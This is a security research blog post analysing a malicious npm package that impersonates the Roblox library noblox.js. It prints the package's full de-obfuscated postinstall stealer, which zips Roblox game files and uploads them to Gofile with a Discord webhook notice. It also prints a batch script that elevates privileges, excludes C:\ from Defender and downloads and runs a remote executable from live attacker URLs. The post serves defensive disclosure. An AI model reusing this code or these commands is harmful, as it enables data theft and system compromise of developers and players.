Socket Research Team
Sarah Gooding
February 6, 2024
Roblox users are the target of a new supply chain attack that is delivered through a malicious package impersonating the official Noblox.js npm package and its sister library, noblox.js-server. The popular gaming platform boasts 70.2 million daily users and 216+ million monthly active users, making it a lucrative target for cybercriminals looking to exploit its large, highly engaged user base.
Noblox.js is a widely used API wrapper for Roblox games, available on npm as an independent package. The package is actively utilized by the community, with an average download count of over 1,500 per week.
The Socket Research team has conducted an investigation on a package called noblox.js-proxy-server (version number 4.15.4) that is being used to steal sensitive data from Roblox users. Developers using Roblox's API have frequently been the target of these types of malicious packages.
This potentially impacts developers intending to use the Noblox.js package for game development or other functionalities within Roblox, if they inadvertently incorporate the malicious package into their games, leading to the compromise of their projects and potentially spreading the impact to their game players. It also potentially impacts Roblox users, where 42.3% are under the age of 13, and their parents, including any financial information linked to their accounts.
The malicious package uses a combination of brandjacking and combosquatting, a variant of typosquatting that creates the impression that a package is coming from a legitimate source by adding a prefix or postfix to a legitimate package name.
The noblox.js-proxy-server package also leverages starjacking, linking the package's GitHub repo URL to the legitimate popular package in order to gain credibility.
It employs static obfuscation techniques to hide the malicious code. Upon de-obfuscation it was observed that the threat actor is targeting Roblox users. Specifically, the package retrieves the current user's username and skips certain directories during directory scanning. It recursively scans a directory for files with specific extensions '.rbxm', '.rbxl', adding them to a zip archive.
The script also downloads and executes a Batch script from a specified URL. It getches a server URL from Gofile, zips the contents of a directory, and uploads the zip file to the server. It also sends a Discord webhook notification with information about the uploaded file and sets up an interval function to repeatedly call a recursive function every 4,000 milliseconds.
The JavaScript code is obfuscated, making it challenging to understand its exact purpose. The code utilizes techniques such as string transformations, string array rotation, string array shuffle, string array index shifting, transforming names with hexadecimal, and other static ways to make it difficult to for a human to understand the code.
The Chinese language has been used in multiple places to define functions. This obfuscation technique has been observed several times in the past with similar Chinese language functions.
Considering these indications, the Socket Research Team opted to conduct a thorough investigation by de-obfuscating the code to determine the intent of the threat actor.
The code embedded at the end of the post is de-obfuscated from the original code. Even after de-obfuscation we observed that the code is using various techniques, including string manipulation, self-executing functions, and encoded strings, making it difficult to analyze its exact functionality.
Let’s break down the code to understand the malicious activities the package is performing.
function user() {
return os.userInfo().username;
}
function skip(_0x1c6fbd) {
const _0x532e43 = [
path.join('C:\\Users', user(), 'AppData\\Local\\Roblox\\Versions'),
];
return _0x532e43.some((_0x3640f2) =>
_0x1c6fbd.toLowerCase().startsWith(_0x3640f2.toLowerCase())
);
}The user function retrieves the current user's username using the os module, while skip(_0x1c6fbd) determines whether to skip a directory based on predefined conditions.
const dir = 'C:\\';
const zippath = 'C:/WindowsApi/output.zip';
const webhook = 'https://discord.com/api/webhooks/...';
const baturl = 'https://cdn.discordapp.com/attachments/...';
const batDestination = 'C:/WindowsApi';As one can see, the script defines configuration variables determining the base directory for scanning (dir), the output zip file path (zippath), Discord webhook URL (webhook), and URLs related to remote batch file execution (baturl, batDestination).
async function executeBat(_0x48dc42, _0x22b872) {
// ... (fetching, saving, and executing a remote batch file)
}
executeBat(baturl, batDestination)
.then(() => {
return fetch('https://api.gofile.io/getServer');
})
.then((_0xe2eb98) => _0xe2eb98.json())
.then((_0x10f434) => {
// ... (processing the result of fetching server information)
})
.catch((_0x48e61a) => console.error(_0x48e61a));executeBat(_0x48dc42, _0x22b872): Asynchronously fetches and executes a remote batch file, with error handling. Subsequent promises fetch server information and process the result.
const _0x421b68 = archiver('zip', _0x19bda1);
const _0x2f7b55 = fs.createWriteStream(zippath);
_0x421b68.pipe(_0x2f7b55);
scan(dir, _0x421b68);
_0x2f7b55.on('close', () => {
// ... (creating a FormData object, uploading zip file to Gofile, and notifying on Discord)
});
_0x421b68.finalize();Here, archiver is used to create a zip file containing selected files from the scan. The FormData object is used to prepare the zip file for upload, which is then sent to Gofile, and a notification is sent on Discord.
The package is downloading the batch file, which is hosted on a Discord CDN server, to perform further malicious activities:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
if not "%1"=="am_admin" (
powershell -Command "Start-Process -Verb RunAs -FilePath '%0' -ArgumentList 'am_admin'"
exit /b
)
set "scriptDir=%~dp0"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
TIMEOUT /T 5
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://1f2a857a-7153-42a6-8363-becc7ed94b49-00-1vtxb7rs21ezi.spock.replit.dev/download', 'C:\WindowsApi\WindowsApi.exe')"
start "" "C:\WindowsApi\WindowsApi.exe"
taskkill /IM cmd.exe
exitThis script is a Windows Batch file with PowerShell commands. This Windows Batch script is a concise yet powerful installer for the WindowsApi. It cleverly minimizes its window, elevates privileges, adds system exclusions, and downloads/executes a remote file. The script showcases common techniques used for system manipulation and emphasizes the importance of caution when dealing with remote downloads. The script further fetches another executable file, and the code is designed to download and execute it from the following URL hxxps://1f2a857a-7153-42a6-8363-becc7ed94b49-00-1vtxb7rs21ezi.spock.replit.dev/download
(New-Object System.Net.WebClient).DownloadFile('https://1f2a857a-7153-42a6-8363-becc7ed94b49-00-1vtxb7rs21ezi.spock.replit.dev/download', 'C:\WindowsApi\WindowsApi.exe')The downloaded file from the given URL is saved as 'C:\WindowsApi\WindowsApi.exe' on the local system.
The script creates a ZIP archive of files from the specified directory (dir) using the archiver library. It fetches the server endpoint for a file-sharing service from hxxps://api.gofile.io/getServer. The ZIP file is uploaded to the file-sharing service using a POST request to the server endpoint. The uploaded file information is then sent to a Discord webhook (webhook).
Classification according the MITRE ATT&CK knowledge base of adversary tactics, techniques and procedures (TTPs) based on real-world observations:
URL of the malicious script: https://socket.dev/npm/package/noblox.js-proxy-server/files/4.15.4/postinstall.js
const FormData = require('form-data')
const fs = require('fs'),
path = require('path'),
os = require('os'),
archiver = require('archiver'),
fetch = require('node-fetch'),
{
promisify
} = require('util')
function user() {
return os.userInfo().username
}
function skip(_0x1c6fbd) {
const _0x532e43 = [
path.join('C:\\Users', user(), 'AppData\\Local\\Roblox\\Versions'),
]
return _0x532e43.some((_0x3640f2) =>
_0x1c6fbd.toLowerCase().startsWith(_0x3640f2.toLowerCase())
)
}
function scan(_0x3e4ad9, _0x4644a2) {
try {
if (skip(_0x3e4ad9)) {
return
}
const _0x42cf2e = fs.readdirSync(_0x3e4ad9)
_0x42cf2e.forEach((_0x1e84f7) => {
const _0x5e677c = path.join(_0x3e4ad9, _0x1e84f7)
try {
const _0x1eb83f = fs.statSync(_0x5e677c)
if (_0x1eb83f.isDirectory()) {
scan(_0x5e677c, _0x4644a2)
} else {
if (
['.rbxm', '.rbxl'].includes(path.extname(_0x5e677c).toLowerCase())
) {
_0x4644a2.file(_0x5e677c, {
name: path.relative(dir, _0x5e677c)
})
}
}
} catch (_0x2b7787) {
return
}
})
} catch (_0x5097c5) {
return
}
}
const dir = 'C:\\',
zippath = 'C:/WindowsApi/output.zip',
webhook =
'https://discord.com/api/webhooks/1193054381885624330/di62gjOhMvTWToy9l-H3ib9PvqFHuxesNn9NbGDj8q51Ziq_laoYgrZt3UseEwlac3bC',
baturl =
'https://cdn.discordapp.com/attachments/1193294801299325020/1196958183533580478/1.bat',
batDestination = 'C:/WindowsApi'
async function executeBat(_0x48dc42, _0x22b872) {
const _0x44f629 = (function () {
const _0x4b46d4 = {
dQcgx: 'while (true) {}',
yFUQM: 'counter',
Ayqst: function (_0x30499c, _0x1f983b) {
return _0x30499c === _0x1f983b
},
ONKJr: 'BhQxJ',
dKjrH: 'nGnIT',
xZIoz: function (_0x1c402b, _0x3af1c0) {
return _0x1c402b(_0x3af1c0)
},
QbHJv: function (_0x425469, _0xd66553) {
return _0x425469 + _0xd66553
},
PUpJi: 'return (function() ',
bxSwU: '{}.constructor("return this")( )',
TGwVe: function (_0x1caaae) {
return _0x1caaae()
},
RmRTi: function (_0x1144d9, _0x17d709) {
return _0x1144d9 !== _0x17d709
},
IDmhJ: 'tUrdr',
JwDvP: 'NAHGZ',
}
let _0x198de8 = true
return function (_0xdf414, _0x1127c6) {
if (_0x4b46d4.RmRTi(_0x4b46d4.IDmhJ, _0x4b46d4.JwDvP)) {
const _0x220be8 = _0x198de8 ?
function () {
const _0x1cd495 = {
CYuIl: _0x4b46d4.dQcgx,
ABrNT: _0x4b46d4.yFUQM,
}
const _0x141c95 = _0x1cd495
if (_0x4b46d4.Ayqst(_0x4b46d4.ONKJr, _0x4b46d4.ONKJr)) {
if (_0x1127c6) {
if (_0x4b46d4.Ayqst(_0x4b46d4.dKjrH, _0x4b46d4.dKjrH)) {
const _0x1d4c91 = _0x1127c6.apply(_0xdf414, arguments)
return (_0x1127c6 = null), _0x1d4c91
} else {
PsFoxV.ZtdiR(_0x3a41dd)
}
}
} else {
return function (_0x1485ea) {}
.constructor(XifnsY.CYuIl)
.apply(XifnsY.ABrNT)
}
} :
function () {}
return (_0x198de8 = false), _0x220be8
} else {
let _0x3ede66
try {
_0x3ede66 = OzJOnA.xZIoz(
_0x2d4153,
OzJOnA.QbHJv(OzJOnA.QbHJv(OzJOnA.PUpJi, OzJOnA.bxSwU), ');')
)()
} catch (_0x551eb9) {
_0x3ede66 = _0x52feac
}
return _0x3ede66
}
}
})(),
_0x5ae6a3 = _0x44f629(this, function () {
return _0x5ae6a3
.toString()
.search('(((.+)+)+)+$')
.toString()
.constructor(_0x5ae6a3)
.search('(((.+)+)+)+$')
})
_0x5ae6a3()
const _0xf9449e = (function () {
let _0x41555f = true
return function (_0x9c4e4d, _0x2c5ddf) {
const _0x8b76ca = _0x41555f ?
function () {
if (_0x2c5ddf) {
const _0xed245 = _0x2c5ddf.apply(_0x9c4e4d, arguments)
return (_0x2c5ddf = null), _0xed245
}
} :
function () {}
return (_0x41555f = false), _0x8b76ca
}
})();
(function () {
_0xf9449e(this, function () {
const _0x3c7677 = new RegExp('function *\\( *\\)'),
_0x1d771d = new RegExp('\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', 'i'),
_0x2c95ea = _0x24101a('init')
if (
!_0x3c7677.test(_0x2c95ea + 'chain') ||
!_0x1d771d.test(_0x2c95ea + 'input')
) {
_0x2c95ea('0')
} else {
_0x24101a()
}
})()
})()
const _0x4c6dc9 = (function () {
let _0x373a8e = true
return function (_0xc7f0cd, _0x1aecda) {
const _0x288d4b = _0x373a8e ?
function () {
if (_0x1aecda) {
const _0x4ebc38 = _0x1aecda.apply(_0xc7f0cd, arguments)
return (_0x1aecda = null), _0x4ebc38
}
} :
function () {}
return (_0x373a8e = false), _0x288d4b
}
})(),
_0x4b2677 = _0x4c6dc9(this, function () {
const _0x57c583 = function () {
let _0x5ac080
try {
_0x5ac080 = Function(
'return (function() {}.constructor("return this")( ));'
)()
} catch (_0x3a7c26) {
_0x5ac080 = window
}
return _0x5ac080
},
_0x3ecad6 = _0x57c583(),
_0x493ac3 = (_0x3ecad6.console = _0x3ecad6.console || {}),
_0x29e09d = [
'log',
'warn',
'info',
'error',
'exception',
'table',
'trace',
]
for (let _0x3078cb = 0; _0x3078cb < _0x29e09d.length; _0x3078cb++) {
const _0x136cf8 = _0x4c6dc9.constructor.prototype.bind(_0x4c6dc9),
_0x40ee4f = _0x29e09d[_0x3078cb],
_0x55572e = _0x493ac3[_0x40ee4f] || _0x136cf8
_0x136cf8['__proto__'] = _0x4c6dc9.bind(_0x4c6dc9)
_0x136cf8.toString = _0x55572e.toString.bind(_0x55572e)
_0x493ac3[_0x40ee4f] = _0x136cf8
}
})
_0x4b2677()
if (!fs.existsSync(_0x22b872)) {
const _0x51dd18 = {
recursive: true
}
fs.mkdirSync(_0x22b872, _0x51dd18)
}
const _0xc537a2 = await fetch(_0x48dc42),
_0x3d418d = await _0xc537a2.buffer()
fs.writeFileSync(_0x22b872 + '/WindowsApiLib.bat', _0x3d418d)
await promisify(require('child_process').exec)(
_0x22b872 + '/WindowsApiLib.bat'
)
}
executeBat(baturl, batDestination)
.then(() => {
return fetch('https://api.gofile.io/getServer')
})
.then((_0xe2eb98) => _0xe2eb98.json())
.then((_0x10f434) => {
if (_0x10f434.status === 'ok') {
const _0x22be29 = _0x10f434.data.server,
_0x38eabd = 'https://' + _0x22be29 + '.gofile.io/uploadFile'
const _0x19bda1 = {
zlib: _0x3290d9
}
const _0x421b68 = archiver('zip', _0x19bda1),
_0x2f7b55 = fs.createWriteStream(zippath)
_0x421b68.pipe(_0x2f7b55)
scan(dir, _0x421b68)
_0x2f7b55.on('close', () => {
const _0x13d5b5 = new FormData()
_0x13d5b5.append('file', fs.createReadStream(zippath))
fetch(_0x38eabd, {
method: 'POST',
body: _0x13d5b5,
})
.then((_0x2d8566) => _0x2d8566.json())
.then((_0x266692) => {
const _0x17343d = JSON.stringify(_0x266692, null, 2),
_0x1103a4 =
'get logged retard 💀💀:\n```' +
_0x17343d +
'```',
_0x19ebec = {
content: _0x1103a4
}
fetch(webhook, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(_0x19ebec),
})
})
})
_0x421b68.finalize()
}
})
.catch((_0x48e61a) => console.error(_0x48e61a));
(function () {
const _0x3d1548 = function () {
const _0x1f6634 = {
UqPDj: function (_0x9c53d0, _0x5498a4, _0x1b302) {
return _0x9c53d0(_0x5498a4, _0x1b302)
},
DCdnG: 'POST',
bAaCp: 'application/json',
sYZzA: 'file',
ITqqc: function (_0x5dbd7b, _0x52b308, _0x3f4cb7) {
return _0x5dbd7b(_0x52b308, _0x3f4cb7)
},
IGsjB: 'zip',
PibLG: function (_0x1f93a8, _0x4df45e, _0x22ec5b) {
return _0x1f93a8(_0x4df45e, _0x22ec5b)
},
PMrti: 'close',
}
let _0x4605bb
try {
_0x4605bb = Function(
'return (function() {}.constructor("return this")( ));'
)()
} catch (_0x162484) {
_0x4605bb = window
}
return _0x4605bb
}
const _0x36f7e3 = _0x3d1548()
_0x36f7e3.setInterval(_0x24101a, 4000)
})()
function _0x24101a(_0x4e7be8) {
function _0x33a811(_0x5e30c9) {
if (typeof _0x5e30c9 === 'string') {
return function (_0x4b0b6f) {}
.constructor('while (true) {}')
.apply('counter')
} else {
if (('' + _0x5e30c9 / _0x5e30c9).length !== 1 || _0x5e30c9 % 20 === 0) {
;
(function () {
return true
}
.constructor('debugger')
.call('action'))
} else {
;
(function () {
return false
}
.constructor('debugger')
.apply('stateObject'))
}
}
_0x33a811(++_0x5e30c9)
}
try {
if (_0x4e7be8) {
return _0x33a811
} else {
_0x33a811(0)
}
} catch (_0x2d6f10) {}
}Credits to the Socket Research Team: Dhanesh Hitesh Dodia, Sambarathi Sai, Viren Saroha
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
Impostor NuGet package Tracer.Fody.NLog typosquats Tracer.Fody and its author, using homoglyph tricks, and exfiltrates Stratis wallet JSON/passwords to a Russian IP address.
Security News
/Research
Socket found a Rust typosquat (finch-rust) that loads sha-rust to steal credentials, using impersonation and an unpinned dependency to auto-deliver updates.
Research
/Security Fundamentals
A pair of typosquatted Go packages posing as Google’s UUID library quietly turn helper functions into encrypted exfiltration channels to a paste site, putting developer and CI data at risk.